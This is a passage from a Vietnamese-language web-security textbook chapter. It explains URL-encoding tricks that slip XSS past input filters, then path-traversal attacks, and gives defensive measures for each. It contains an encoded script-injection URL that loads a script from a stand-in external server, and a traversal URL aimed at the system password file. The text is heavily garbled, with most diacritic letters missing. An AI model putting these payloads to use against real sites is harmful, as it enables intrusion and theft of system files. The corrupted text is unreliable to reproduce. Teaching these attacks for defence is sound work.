I.1. Khái ni m
Theo RFC 1738 đnh ngh a URL và RFC 2369 cho URIs, nh ng kí t đ c gi i h n s d ng trên URL ho c URI là m t t p các kí t US-ASCII. Theo RFC 1738, 2369 nh ng kí t ch s , kí t đ c bi t nh “ $-_.+!*’() ” và m t s kí t dành riêng là không b mã hoá trên URL hay URIs. Còn nh ng kí t đ c bi t khác thì
đ c mã hóa nh kho ng tr ng, < > ”…Sau khi trình ch nh n đ c d li u này, trình ch s t đ ng gi i mãđ thao tác nh bình th ng.
V y hacker có th l i d ngđ c gì trong URL mã hóa này.
Nh ng nhà phát tri n ng d ng có th s thi t k ng d ng đ ki m tra d li u nh p vào c a ng i dùng có h p l hay không, nh ng kí t đ c bi c nh < > trong th script th ng đ c dùng trong nh ng k thu t t n công nh XSS s b l ai b V y đ h p th c hóa n i dung d li u c n nh p, hacker thay vì nh p tr c ti p kí t đ c bi t vào ô nh p thì h có th nh p nh ng kí t đãđ c mã hoá theo chu n RFC 1738, RFC 2369. Nh v y b ng cách đó, hacker có th d dàng v t qua ki m soát này.
Ch ng 10: M t s k thu t t n công khác
Ví d 10.I.1-1:
http://www.myserver.c0m/script.php?mydata=%3cscript%20src=%22htt p%3a%2f%2fwww.yourserver.com%2fbadscript.js%22%3e%3c%2fscript%3e
Bi n mydata s mang n i dung:
<script src="http://www.yourserver.com/badscript.js"></script>
I.2. M t s bi n pháp phòng ch ng
• Tránh s d ng ph ng th c GET vì n u dùng GET, d li u d dàng đ c thêm vào URL. Vì th , s d ng ph ng th c POST b t c khi nào có th .
• Trong tr ng h p URL b t bu c đ c s d ng đ chuy n d li u lên trình ch , c n gi i h n ki u d li u, nên ki m tra d li u trong ng d ng tr c khi s d ng.
• Không nên s d ng ngôn ng máy khách đ ki m tra tính đúng đ n c a d li u.
II. KI U T N CÔNG V T NG D N
II.1. Khái ni m
Nhi u ng d ng s d ng t p tin h th ng c a trình ch trong “l p trình bày” đ
hi n th thông tin l u tr t m th i. Nh ng t p tin này bao g m nh ng t p tin hình nh , t p tin HTML, hay nh ng ng d ng CGI. Th m c WWW-ROOT là m t th m c g c o bên trong trình ch , n i mà đ c truy xu t b i trình duy t. ng d ng l u tr thông tin bên trong ho c bên ngòai WWW-ROOT.
N u ng d ng không ki m tra nh ng kí t đ c bi t, th ng đ c s d ng trong
Ch ng 10: M t s k thu t t n công khác
v t đ ng d n. Hacker có th yêu c u trình ch tr v k t qu là n i dung nh ng t p tin v t lí nh /etc/password…
Tóm l i:
Ki u t n công này c ng d a vào s l ng l o trong quá trình ki m tra d li u trên URL, cookie, HTTP Header yêu c u. L i d ng quy n truy xu t m t t p tin c a
ng d ng, nh đó hacker có th xemđ c file l u tr trên h th ng.
Ví d 10.II.1-1:
http://maydich.com/show.asp?result= “dangnhapthanhcong.asp”
nh ng n u hacker thayđ i tên t p tin c n truy xu t nh sau:
http://maydich.com/show.asp?result= ../etc/password
nh v y hacker có th xem n i dung file passwordđ c l u tr trong h th ng.
II.2. M t s bi n pháp phòng ch ng
Vi c phòng ch ng ki u t n công v t đ ng d n là m t th thách l n cho nh ng nhà ng d ng trong m t h th ng phân tán. Tuy nhiên, cách phòng ch ng t t nh t v n là ng d ng c n ki m tra vi c truy xu t file tr c khi xu t k t qu cho trình duy t.
Ch ng 10: M t s k thu t t n công khác